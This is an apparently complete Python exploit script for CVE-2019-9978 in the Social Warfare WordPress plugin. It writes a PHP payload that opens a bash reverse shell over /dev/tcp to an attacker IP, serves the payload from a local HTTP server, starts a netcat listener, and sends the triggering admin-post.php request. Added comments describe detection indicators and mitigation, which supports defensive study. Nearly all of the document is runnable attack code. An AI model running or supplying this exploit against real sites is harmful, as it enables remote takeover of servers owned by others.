#!/usr/bin/env python3
#
#*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
#*Date*: 2025-05-20
#*Exploit Author*: Huseyin Mardinli
#*Vendor Homepage*: https://warfareplugins.com/
#*Software Link*: https://wordpress.org/plugins/social-warfare/
#*Version*: <= 3.5.2
#*Tested on*: Apache, Ubuntu 20.04
#*CVE*: CVE-2019-9978
#
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# --- Config ---
# Every setting is a hard-coded module constant; the script reads no
# command-line arguments or environment variables.
# Base URL of the WordPress site that receives the request (placeholder domain).
TARGET_URL = "http://example.com"
# Address embedded in the payload and in the swp_url parameter. The affected
# server has to reach it on HTTP_PORT (fetch) and LISTEN_PORT (connect-back),
# so outbound traffic from a web server to an unfamiliar host on these ports is
# the network indicator this PoC produces.
ATTACKER_IP = "192.168.26.130" # Change to your attack box IP
# TCP port the local payload HTTP server binds to.
HTTP_PORT = 8000
# TCP port the netcat listener binds to and the payload connects back to.
LISTEN_PORT = 4444
# File name written to the current working directory and used as the URL path.
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
# The file holds one PHP system() call wrapped in <pre> tags; the call runs
# bash with /dev/tcp redirection back to ATTACKER_IP:LISTEN_PORT.
# NOTE(review): the <pre> wrapper is presumably what the vulnerable plugin
# code extracts before evaluating the fetched content - confirm against the
# plugin source for versions <= 3.5.2.
# Detection: on an affected host this appears as the web server's PHP process
# spawning bash with an outbound TCP connection.
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
# Written relative to the current working directory; an existing file with
# the same name is overwritten ("w" mode).
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
# SimpleHTTPRequestHandler serves files from the process's current working
# directory, and the empty host string binds every local interface.
# NOTE(review): every file in that directory, not only PAYLOAD_FILE, is
# readable by anyone who can reach HTTP_PORT while this runs.
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
# Blocks for the lifetime of the thread that calls it; never returns normally.
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
# Runs the external `nc` binary with an argument list (no shell involved) and
# blocks until that process exits. The binary must be on PATH; its exit
# status is returned by subprocess.call() and discarded here.
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
# URL the affected plugin is asked to fetch: the locally served payload file.
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
# The request carries no cookies or credentials. swp_url is concatenated
# as-is, without URL-encoding.
# Detection: access-log entries for /wp-admin/admin-post.php that carry
# swp_debug=load_options together with an swp_url pointing at an external
# host, followed by an outbound HTTP fetch from the web server.
# Mitigation: run a Social Warfare release newer than 3.5.2 and restrict
# outbound connections from the web server.
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
# 5-second timeout; the response body and status code are never inspected.
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
# Every requests-level error (timeout, refused connection, ...) is
# silently discarded, so the script reports nothing about the outcome.
pass
def main():
# Order of operations: write the payload file, serve it over HTTP, start the
# netcat listener, then send the single triggering request.
create_payload()
# Start web server in background
# daemon=True: this thread does not keep the process alive on its own.
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
# Fixed delay, not a readiness check; a failed bind in the server thread is
# not detected here.
time.sleep(2) # Give server time to start
# Start listener in background
# Non-daemon thread: the process stays alive until the nc subprocess exits.
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
# Script entry point: run main() only when executed directly, not on import.
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
# Ctrl-C in the main thread prints a notice instead of a traceback.
print("[-] Interrupted by user.")
WordPress Social Warfare 3.5.2 Remote Code Execution
- Written by: khalil shreateh